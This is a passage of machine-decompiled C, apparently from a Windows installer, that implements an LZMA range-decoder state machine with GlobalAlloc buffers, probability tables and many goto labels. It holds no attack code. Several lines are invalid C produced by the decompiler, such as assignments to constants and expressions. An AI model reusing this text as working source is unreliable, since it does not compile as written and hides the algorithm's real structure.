                    													L11:
                    													_t611 = _t611 - 1;
                    													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                    												} while (_t611 != 0);
                    												goto L12;
                    											}
                    											if( *(_t612 - 4) != 0) {
                    												GlobalFree( *(_t612 - 4));
                    											}
                    											_t534 = GlobalAlloc(0x40, 0x600); // executed
                    											 *(_t612 - 4) = _t534;
                    											if(_t534 == 0) {
                    												goto L171;
                    											} else {
                    												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                    												goto L10;
                    											}
                    										case 1:
                    											L13:
                    											__eflags =  *(_t612 - 0x6c);
                    											if( *(_t612 - 0x6c) == 0) {
                    												 *(_t612 - 0x88) = 1;
                    												goto L170;
                    											}
                    											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                    											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                    											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                    											_t45 = _t612 - 0x48;
                    											 *_t45 =  *(_t612 - 0x48) + 1;
                    											__eflags =  *_t45;
                    											L15:
                    											if( *(_t612 - 0x48) < 4) {
                    												goto L13;
                    											}
                    											_t546 =  *(_t612 - 0x40);
                    											if(_t546 ==  *(_t612 - 0x74)) {
                    												L20:
                    												 *(_t612 - 0x48) = 5;
                    												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                    												goto L23;
                    											}
                    											 *(_t612 - 0x74) = _t546;
                    											if( *(_t612 - 8) != 0) {
                    												GlobalFree( *(_t612 - 8));
                    											}
                    											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                    											 *(_t612 - 8) = _t534;
                    											if(_t534 == 0) {
                    												goto L171;
                    											} else {
                    												goto L20;
                    											}
                    										case 2:
                    											L24:
                    											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                    											 *(_t612 - 0x84) = 6;
                    											 *(_t612 - 0x4c) = _t553;
                    											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                    											goto L132;
                    										case 3:
                    											L21:
                    											__eflags =  *(_t612 - 0x6c);
                    											if( *(_t612 - 0x6c) == 0) {
                    												 *(_t612 - 0x88) = 3;
                    												goto L170;
                    											}
                    											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                    											_t67 = _t612 - 0x70;
                    											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                    											__eflags =  *_t67;
                    											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                    											L23:
                    											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                    											if( *(_t612 - 0x48) != 0) {
                    												goto L21;
                    											}
                    											goto L24;
                    										case 4:
                    											L133:
                    											_t531 =  *_t605;
                    											_t588 = _t531 & 0x0000ffff;
                    											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                    											if( *(_t612 - 0xc) >= _t564) {
                    												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                    												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                    												 *(_t612 - 0x40) = 1;
                    												_t532 = _t531 - (_t531 >> 5);
                    												__eflags = _t532;
                    												 *_t605 = _t532;
                    											} else {
                    												 *(_t612 - 0x10) = _t564;
                    												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                    												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                    											}
                    											if( *(_t612 - 0x10) >= 0x1000000) {
                    												goto L139;
                    											} else {
                    												goto L137;
                    											}
                    										case 5:
                    											L137:
                    											if( *(_t612 - 0x6c) == 0) {
                    												 *(_t612 - 0x88) = 5;
                    												goto L170;
                    											}
                    											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                    											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                    											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                    											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                    											L139:
                    											_t533 =  *(_t612 - 0x84);
                    											goto L140;
                    										case 6:
                    											__edx = 0;
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x34) = 1;
                    												 *(__ebp - 0x84) = 7;
                    												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                    												goto L132;
                    											}
                    											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                    											__esi =  *(__ebp - 0x60);
                    											__cl = 8;
                    											__cl = 8 -  *(__ebp - 0x3c);
                    											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                    											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                    											__ecx =  *(__ebp - 0x3c);
                    											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                    											__ecx =  *(__ebp - 4);
                    											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                    											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                    											__eflags =  *(__ebp - 0x38) - 4;
                    											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    											if( *(__ebp - 0x38) >= 4) {
                    												__eflags =  *(__ebp - 0x38) - 0xa;
                    												if( *(__ebp - 0x38) >= 0xa) {
                    													_t98 = __ebp - 0x38;
                    													 *_t98 =  *(__ebp - 0x38) - 6;
                    													__eflags =  *_t98;
                    												} else {
                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                    												}
                    											} else {
                    												 *(__ebp - 0x38) = 0;
                    											}
                    											__eflags =  *(__ebp - 0x34) - __edx;
                    											if( *(__ebp - 0x34) == __edx) {
                    												__ebx = 0;
                    												__ebx = 1;
                    												goto L61;
                    											} else {
                    												__eax =  *(__ebp - 0x14);
                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    												__eflags = __eax -  *(__ebp - 0x74);
                    												if(__eax >=  *(__ebp - 0x74)) {
                    													__eax = __eax +  *(__ebp - 0x74);
                    													__eflags = __eax;
                    												}
                    												__ecx =  *(__ebp - 8);
                    												__ebx = 0;
                    												__ebx = 1;
                    												__al =  *((intOrPtr*)(__eax + __ecx));
                    												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                    												goto L41;
                    											}
                    										case 7:
                    											__eflags =  *(__ebp - 0x40) - 1;
                    											if( *(__ebp - 0x40) != 1) {
                    												__eax =  *(__ebp - 0x24);
                    												 *(__ebp - 0x80) = 0x16;
                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    												__eax =  *(__ebp - 0x28);
                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    												__eax =  *(__ebp - 0x2c);
                    												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    												__eax = 0;
                    												__eflags =  *(__ebp - 0x38) - 7;
                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    												__al = __al & 0x000000fd;
                    												__eax = (__eflags >= 0) - 1 + 0xa;
                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                    												__eax =  *(__ebp - 4);
                    												__eax =  *(__ebp - 4) + 0x664;
                    												__eflags = __eax;
                    												 *(__ebp - 0x58) = __eax;
                    												goto L69;
                    											}
                    											__eax =  *(__ebp - 4);
                    											__ecx =  *(__ebp - 0x38);
                    											 *(__ebp - 0x84) = 8;
                    											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                    											goto L132;
                    										case 8:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x84) = 0xa;
                    												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                    											} else {
                    												__eax =  *(__ebp - 0x38);
                    												__ecx =  *(__ebp - 4);
                    												__eax =  *(__ebp - 0x38) + 0xf;
                    												 *(__ebp - 0x84) = 9;
                    												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                    												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                    											}
                    											goto L132;
                    										case 9:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												goto L90;
                    											}
                    											__eflags =  *(__ebp - 0x60);
                    											if( *(__ebp - 0x60) == 0) {
                    												goto L171;
                    											}
                    											__eax = 0;
                    											__eflags =  *(__ebp - 0x38) - 7;
                    											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                    											__eflags = _t259;
                    											0 | _t259 = _t259 + _t259 + 9;
                    											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                    											goto L76;
                    										case 0xa:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x84) = 0xb;
                    												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                    												goto L132;
                    											}
                    											__eax =  *(__ebp - 0x28);
                    											goto L89;
                    										case 0xb:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__ecx =  *(__ebp - 0x24);
                    												__eax =  *(__ebp - 0x20);
                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    											} else {
                    												__eax =  *(__ebp - 0x24);
                    											}
                    											__ecx =  *(__ebp - 0x28);
                    											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    											L89:
                    											__ecx =  *(__ebp - 0x2c);
                    											 *(__ebp - 0x2c) = __eax;
                    											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    											L90:
                    											__eax =  *(__ebp - 4);
                    											 *(__ebp - 0x80) = 0x15;
                    											__eax =  *(__ebp - 4) + 0xa68;
                    											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                    											goto L69;
                    										case 0xc:
                    											L100:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xc;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t335 = __ebp - 0x70;
                    											 *_t335 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t335;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											__eax =  *(__ebp - 0x2c);
                    											goto L102;
                    										case 0xd:
                    											L37:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xd;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t122 = __ebp - 0x70;
                    											 *_t122 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t122;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											L39:
                    											__eax =  *(__ebp - 0x40);
                    											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                    												goto L48;
                    											}
                    											__eflags = __ebx - 0x100;
                    											if(__ebx >= 0x100) {
                    												goto L54;
                    											}
                    											L41:
                    											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                    											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                    											__ecx =  *(__ebp - 0x58);
                    											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                    											 *(__ebp - 0x48) = __eax;
                    											__eax = __eax + 1;
                    											__eax = __eax << 8;
                    											__eax = __eax + __ebx;
                    											__esi =  *(__ebp - 0x58) + __eax * 2;
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    											__ax =  *__esi;
                    											 *(__ebp - 0x54) = __esi;
                    											__edx = __ax & 0x0000ffff;
                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                    											__eflags =  *(__ebp - 0xc) - __ecx;
                    											if( *(__ebp - 0xc) >= __ecx) {
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    												__cx = __ax;
                    												 *(__ebp - 0x40) = 1;
                    												__cx = __ax >> 5;
                    												__eflags = __eax;
                    												__ebx = __ebx + __ebx + 1;
                    												 *__esi = __ax;
                    											} else {
                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                    												 *(__ebp - 0x10) = __ecx;
                    												0x800 = 0x800 - __edx;
                    												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                    												__ebx = __ebx + __ebx;
                    												 *__esi = __cx;
                    											}
                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                    											 *(__ebp - 0x44) = __ebx;
                    											if( *(__ebp - 0x10) >= 0x1000000) {
                    												goto L39;
                    											} else {
                    												goto L37;
                    											}
                    										case 0xe:
                    											L46:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xe;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t156 = __ebp - 0x70;
                    											 *_t156 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t156;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											while(1) {
                    												L48:
                    												__eflags = __ebx - 0x100;
                    												if(__ebx >= 0x100) {
                    													break;
                    												}
                    												__eax =  *(__ebp - 0x58);
                    												__edx = __ebx + __ebx;
                    												__ecx =  *(__ebp - 0x10);
                    												__esi = __edx + __eax;
                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                    												__ax =  *__esi;
                    												 *(__ebp - 0x54) = __esi;
                    												__edi = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													_t170 = __edx + 1; // 0x1
                    													__ebx = _t170;
                    													__cx = __ax >> 5;
                    													__eflags = __eax;
                    													 *__esi = __ax;
                    												} else {
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edi;
                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    													__ebx = __ebx + __ebx;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													continue;
                    												} else {
                    													goto L46;
                    												}
                    											}
                    											L54:
                    											_t173 = __ebp - 0x34;
                    											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                    											__eflags =  *_t173;
                    											goto L55;
                    										case 0xf:
                    											L58:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xf;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t203 = __ebp - 0x70;
                    											 *_t203 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t203;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											L60:
                    											__eflags = __ebx - 0x100;
                    											if(__ebx >= 0x100) {
                    												L55:
                    												__al =  *(__ebp - 0x44);
                    												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                    												goto L56;
                    											}
                    											L61:
                    											__eax =  *(__ebp - 0x58);
                    											__edx = __ebx + __ebx;
                    											__ecx =  *(__ebp - 0x10);
                    											__esi = __edx + __eax;
                    											__ecx =  *(__ebp - 0x10) >> 0xb;
                    											__ax =  *__esi;
                    											 *(__ebp - 0x54) = __esi;
                    											__edi = __ax & 0x0000ffff;
                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    											__eflags =  *(__ebp - 0xc) - __ecx;
                    											if( *(__ebp - 0xc) >= __ecx) {
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    												__cx = __ax;
                    												_t217 = __edx + 1; // 0x1
                    												__ebx = _t217;
                    												__cx = __ax >> 5;
                    												__eflags = __eax;
                    												 *__esi = __ax;
                    											} else {
                    												 *(__ebp - 0x10) = __ecx;
                    												0x800 = 0x800 - __edi;
                    												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    												__ebx = __ebx + __ebx;
                    												 *__esi = __cx;
                    											}
                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                    											 *(__ebp - 0x44) = __ebx;
                    											if( *(__ebp - 0x10) >= 0x1000000) {
                    												goto L60;
                    											} else {
                    												goto L58;
                    											}
                    										case 0x10:
                    											L110:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0x10;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t366 = __ebp - 0x70;
                    											 *_t366 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t366;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											goto L112;
                    										case 0x11:
                    											L69:
                    											__esi =  *(__ebp - 0x58);
                    											 *(__ebp - 0x84) = 0x12;
                    											L132:
                    											 *(_t612 - 0x54) = _t605;
                    											goto L133;
                    										case 0x12:
                    											goto L0;
                    										case 0x13:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												_t469 = __ebp - 0x58;
                    												 *_t469 =  *(__ebp - 0x58) + 0x204;
                    												__eflags =  *_t469;
                    												 *(__ebp - 0x30) = 0x10;
                    												 *(__ebp - 0x40) = 8;
                    												goto L144;
                    											}
                    											__eax =  *(__ebp - 0x4c);
                    											__ecx =  *(__ebp - 0x58);
                    											__eax =  *(__ebp - 0x4c) << 4;
                    											 *(__ebp - 0x30) = 8;
                    											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                    											goto L130;
                    										case 0x14:
                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                    											__eax =  *(__ebp - 0x80);
                    											L140:
                    											 *(_t612 - 0x88) = _t533;
                    											goto L1;
                    										case 0x15:
                    											__eax = 0;
                    											__eflags =  *(__ebp - 0x38) - 7;
                    											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    											__al = __al & 0x000000fd;
                    											__eax = (__eflags >= 0) - 1 + 0xb;
                    											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                    											goto L121;
                    										case 0x16:
                    											__eax =  *(__ebp - 0x30);
                    											__eflags = __eax - 4;
                    											if(__eax >= 4) {
                    												_push(3);
                    												_pop(__eax);
                    											}
                    											__ecx =  *(__ebp - 4);
                    											 *(__ebp - 0x40) = 6;
                    											__eax = __eax << 7;
                    											 *(__ebp - 0x7c) = 0x19;
                    											 *(__ebp - 0x58) = __eax;
                    											goto L145;
                    										case 0x17:
                    											goto L145;
                    										case 0x18:
                    											L146:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0x18;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t484 = __ebp - 0x70;
                    											 *_t484 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t484;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											L148:
                    											_t487 = __ebp - 0x48;
                    											 *_t487 =  *(__ebp - 0x48) - 1;
                    											__eflags =  *_t487;
                    											goto L149;
                    										case 0x19:
                    											__eflags = __ebx - 4;
                    											if(__ebx < 4) {
                    												 *(__ebp - 0x2c) = __ebx;
                    												L120:
                    												_t394 = __ebp - 0x2c;
                    												 *_t394 =  *(__ebp - 0x2c) + 1;
                    												__eflags =  *_t394;
                    												L121:
                    												__eax =  *(__ebp - 0x2c);
                    												__eflags = __eax;
                    												if(__eax == 0) {
                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                    													goto L170;
                    												}
                    												__eflags = __eax -  *(__ebp - 0x60);
                    												if(__eax >  *(__ebp - 0x60)) {
                    													goto L171;
                    												}
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                    												__eax =  *(__ebp - 0x30);
                    												_t401 = __ebp - 0x60;
                    												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                    												__eflags =  *_t401;
                    												goto L124;
                    											}
                    											__ecx = __ebx;
                    											__eax = __ebx;
                    											__ecx = __ebx >> 1;
                    											__eax = __ebx & 0x00000001;
                    											__ecx = (__ebx >> 1) - 1;
                    											__al = __al | 0x00000002;
                    											__eax = (__ebx & 0x00000001) << __cl;
                    											__eflags = __ebx - 0xe;
                    											 *(__ebp - 0x2c) = __eax;
                    											if(__ebx >= 0xe) {
                    												__ebx = 0;
                    												 *(__ebp - 0x48) = __ecx;
                    												L103:
                    												__eflags =  *(__ebp - 0x48);
                    												if( *(__ebp - 0x48) <= 0) {
                    													__eax = __eax + __ebx;
                    													 *(__ebp - 0x40) = 4;
                    													 *(__ebp - 0x2c) = __eax;
                    													__eax =  *(__ebp - 4);
                    													__eax =  *(__ebp - 4) + 0x644;
                    													__eflags = __eax;
                    													L109:
                    													__ebx = 0;
                    													 *(__ebp - 0x58) = __eax;
                    													 *(__ebp - 0x50) = 1;
                    													 *(__ebp - 0x44) = 0;
                    													 *(__ebp - 0x48) = 0;
                    													L113:
                    													__eax =  *(__ebp - 0x40);
                    													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                    														_t392 = __ebp - 0x2c;
                    														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                    														__eflags =  *_t392;
                    														goto L120;
                    													}
                    													__eax =  *(__ebp - 0x50);
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    													__eax =  *(__ebp - 0x58);
                    													__esi = __edi + __eax;
                    													 *(__ebp - 0x54) = __esi;
                    													__ax =  *__esi;
                    													__ecx = __ax & 0x0000ffff;
                    													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                    													__eflags =  *(__ebp - 0xc) - __edx;
                    													if( *(__ebp - 0xc) >= __edx) {
                    														__ecx = 0;
                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                    														__ecx = 1;
                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                    														__ebx = 1;
                    														__ecx =  *(__ebp - 0x48);
                    														__ebx = 1 << __cl;
                    														__ecx = 1 << __cl;
                    														__ebx =  *(__ebp - 0x44);
                    														__ebx =  *(__ebp - 0x44) | __ecx;
                    														__cx = __ax;
                    														__cx = __ax >> 5;
                    														__eax = __eax - __ecx;
                    														__edi = __edi + 1;
                    														__eflags = __edi;
                    														 *(__ebp - 0x44) = __ebx;
                    														 *__esi = __ax;
                    														 *(__ebp - 0x50) = __edi;
                    													} else {
                    														 *(__ebp - 0x10) = __edx;
                    														0x800 = 0x800 - __ecx;
                    														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                    														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    														 *__esi = __dx;
                    													}
                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                    													if( *(__ebp - 0x10) >= 0x1000000) {
                    														L112:
                    														_t369 = __ebp - 0x48;
                    														 *_t369 =  *(__ebp - 0x48) + 1;
                    														__eflags =  *_t369;
                    														goto L113;
                    													} else {
                    														goto L110;
                    													}
                    												}
                    												__ecx =  *(__ebp - 0xc);
                    												__ebx = __ebx + __ebx;
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                    												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                    													__ecx =  *(__ebp - 0x10);
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    													__ebx = __ebx | 0x00000001;
                    													__eflags = __ebx;
                    													 *(__ebp - 0x44) = __ebx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													L102:
                    													_t339 = __ebp - 0x48;
                    													 *_t339 =  *(__ebp - 0x48) - 1;
                    													__eflags =  *_t339;
                    													goto L103;
                    												} else {
                    													goto L100;
                    												}
                    											}
                    											__edx =  *(__ebp - 4);
                    											__eax = __eax - __ebx;
                    											 *(__ebp - 0x40) = __ecx;
                    											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                    											goto L109;
                    										case 0x1a:
                    											L56:
                    											__eflags =  *(__ebp - 0x64);
                    											if( *(__ebp - 0x64) == 0) {
                    												 *(__ebp - 0x88) = 0x1a;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x68);
                    											__al =  *(__ebp - 0x5c);
                    											__edx =  *(__ebp - 8);
                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
